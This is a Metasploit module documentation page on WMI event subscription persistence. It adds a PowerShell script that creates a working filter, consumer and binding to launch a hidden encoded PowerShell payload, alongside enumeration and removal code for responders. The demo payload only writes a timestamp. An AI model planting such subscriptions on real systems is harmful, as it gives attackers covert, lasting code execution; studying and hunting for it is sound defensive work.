WMI Event Subscription Persistence

Disclosed
06/06/2017
Created
05/30/2018

Description

This module creates a permanent WMI event subscription to achieve fileless persistence using one of five trigger methods. In every case the subscription consists of an event filter (a WQL query), a command-line event consumer that launches an encoded PowerShell payload, and a binding between the two.

The EVENT method creates an event filter that watches the event log for an EVENT_ID_TRIGGER (default: failed logon, event ID 4625) whose record also contains the specified USERNAME_TRIGGER. Failed-logon auditing must be enabled on the target for this method to work; it can be enabled with "auditpol.exe /set /subcategory:Logon /failure:Enable". When both criteria are met, the consumer runs the payload.

The INTERVAL method creates an event filter that triggers the payload every CALLBACK_INTERVAL seconds. The LOGON method creates an event filter that triggers the payload once the system has been up for 4 minutes, i.e. shortly after each boot. The PROCESS method creates an event filter that triggers the payload when the specified process is started. The WAITFOR method creates an event filter that launches the Microsoft binary waitfor.exe to block until the signal named in WAITFOR_TRIGGER is received before executing the payload; the signal can be sent from a Windows host on the LAN with the waitfor.exe command (this requires port 445 to be open on the target).

A custom command can be run instead of the default payload once the trigger fires by setting the advanced option CUSTOM_PS_COMMAND.

This module requires administrator-level privileges in a high-integrity process. Stageless payloads are not recommended: the encoded PowerShell payload is passed on the consumer's command line, which is subject to command-line length limits, and a stageless payload often exceeds them.
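The following PowerShell is an added example, written for this page and not the module's own code, that builds the three objects described above for each trigger type, lists whatever permanent subscriptions a host currently has (the check a responder would run), and removes the demo one. The names (WmiDemo_*), the demo payload (which only appends a timestamp to a file), and the 240 to 325 second uptime window used for the LOGON-style query are assumptions; the WITHIN 60 poll plus that 85 second window guarantees exactly one firing per boot.

```powershell
#Requires -RunAsAdministrator
# Added example: permanent WMI event subscription persistence, enumeration and removal.
# Not the Metasploit module's code. Names beginning WmiDemo_ and the payload are assumptions.
$Ns = 'root\subscription'

# WQL queries for four of the five trigger types. WAITFOR reuses one of these queries and
# differs only in the consumer command (see New-WmiPersistence).
function Get-TriggerQuery {
    param(
        [ValidateSet('Event','Interval','Logon','Process')][string]$Method,
        [int]$EventId = 4625,            # failed logon
        [string]$User = 'Administrator', # must appear in the event text
        [int]$Interval = 60,             # seconds
        [string]$Process = 'notepad.exe'
    )
    switch ($Method) {
        # Security-log record with this ID naming the user. Needs failure auditing:
        #   auditpol.exe /set /subcategory:Logon /failure:Enable
        'Event'    { "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_NTLogEvent' " +
                     "AND TargetInstance.Logfile = 'Security' AND TargetInstance.EventCode = '$EventId' " +
                     "AND TargetInstance.Message LIKE '%$User%'" }
        # The perf-counter instance changes on every poll, so this fires every $Interval seconds.
        'Interval' { "SELECT * FROM __InstanceModificationEvent WITHIN $Interval " +
                     "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" }
        # Uptime window (assumed bounds) that a 60 s poll hits exactly once after each boot.
        'Logon'    { "SELECT * FROM __InstanceModificationEvent WITHIN 60 " +
                     "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " +
                     "AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" }
        # Fires when a process with this image name is created.
        'Process'  { "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' " +
                     "AND TargetInstance.Name = '$Process'" }
    }
}

# UTF-16LE + base64, the form powershell.exe -EncodedCommand expects.
function ConvertTo-EncodedCommand([string]$Script) {
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

# Create filter, consumer and binding. With -WaitForSignal the consumer first blocks in
# waitfor.exe until 'waitfor.exe /S <target> /SI <signal>' arrives from a LAN host (needs 445 open).
function New-WmiPersistence {
    param([string]$Name, [string]$Query, [string]$Script, [string]$WaitForSignal)
    $cmd = "powershell.exe -NoP -NonI -W Hidden -EncodedCommand $(ConvertTo-EncodedCommand $Script)"
    if ($WaitForSignal) { $cmd = "cmd.exe /C waitfor.exe $WaitForSignal && $cmd" }
    $filter   = Set-WmiInstance -Namespace $Ns -Class __EventFilter -Arguments @{
                    Name = $Name; EventNamespace = 'root\cimv2'; QueryLanguage = 'WQL'; Query = $Query }
    $consumer = Set-WmiInstance -Namespace $Ns -Class CommandLineEventConsumer -Arguments @{
                    Name = $Name; CommandLineTemplate = $cmd }
    Set-WmiInstance -Namespace $Ns -Class __FilterToConsumerBinding -Arguments @{
        Filter = $filter; Consumer = $consumer } | Out-Null
}

# Responder check: resolve every binding to its filter query and consumer command.
function Get-WmiPersistence {
    foreach ($b in Get-WmiObject -Namespace $Ns -Class __FilterToConsumerBinding) {
        $f = [wmi]$b.Filter; $c = [wmi]$b.Consumer
        [pscustomobject]@{ Filter = $f.Name; Query = $f.Query
                           ConsumerClass = $c.__CLASS; Consumer = $c.Name
                           Command = $c.CommandLineTemplate }   # null for non-command-line consumers
    }
}

# Remove binding first, then filter and consumer, all matched by name.
function Remove-WmiPersistence([string]$Name) {
    $pat = 'Name="' + [regex]::Escape($Name) + '"'
    Get-WmiObject -Namespace $Ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -match $pat } | Remove-WmiObject
    Get-WmiObject -Namespace $Ns -Class __EventFilter -Filter "Name='$Name'" | Remove-WmiObject
    Get-WmiObject -Namespace $Ns -Class CommandLineEventConsumer -Filter "Name='$Name'" | Remove-WmiObject
}

# Lab run: EVENT method with a benign payload, then the defender's view, then cleanup.
$demo = 'Add-Content -Path C:\Windows\Temp\wmi_demo.txt -Value ("fired " + (Get-Date))'
New-WmiPersistence -Name 'WmiDemo_Event' -Query (Get-TriggerQuery -Method Event -User 'Administrator') -Script $demo
Get-WmiPersistence | Format-List
# Windows 10 / Server 2016+ also log each new permanent consumer binding as event 5861.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WMI-Activity/Operational'; Id = 5861 } `
    -MaxEvents 5 -ErrorAction SilentlyContinue | Select-Object TimeCreated, Message
Remove-WmiPersistence -Name 'WmiDemo_Event'
```

Trigger the demo with a deliberately wrong password for Administrator (or, on a host where the WAITFOR variant was created with `-WaitForSignal`, by sending the signal from another machine) and the timestamp file appears; `Get-WmiPersistence` shows the binding regardless of which method was used, which is why enumerating root\subscription is a standard persistence hunt. The page's warning about stageless payloads follows directly from `CommandLineTemplate`: the whole base64 string has to fit in one process command line, and when the consumer goes through `cmd.exe /C` the limit is the stricter cmd.exe one.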

Author

Nick Tyrer <@NickTyrer>

Platform

Windows

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

    msf > use exploit/windows/local/wmi_persistence
    msf exploit(windows/local/wmi_persistence) > show actions
        ...actions...
    msf exploit(windows/local/wmi_persistence) > set ACTION <action-name>
    msf exploit(windows/local/wmi_persistence) > show options
        ...show and set options...
    msf exploit(windows/local/wmi_persistence) > run
